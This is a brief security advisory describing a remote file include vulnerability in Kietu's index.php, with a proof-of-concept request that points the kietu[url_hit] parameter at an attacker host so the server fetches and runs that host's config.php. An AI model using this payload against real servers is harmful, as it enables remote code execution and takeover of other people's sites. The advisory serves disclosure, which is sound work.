Kietu Index.PHP Remote File Include Vulnerability

Kietu Index.PHP Remote File Include Vulnerability

The following proof of concept has been provided:

Issuing the URI request to the vulnerable server will facilitate remote attacker php script execution:

http://www.example.com/index.php?kietu[url_hit]=http://[attacker]/

Where the 'config.php' file must exist:

http://[attacker]/config.php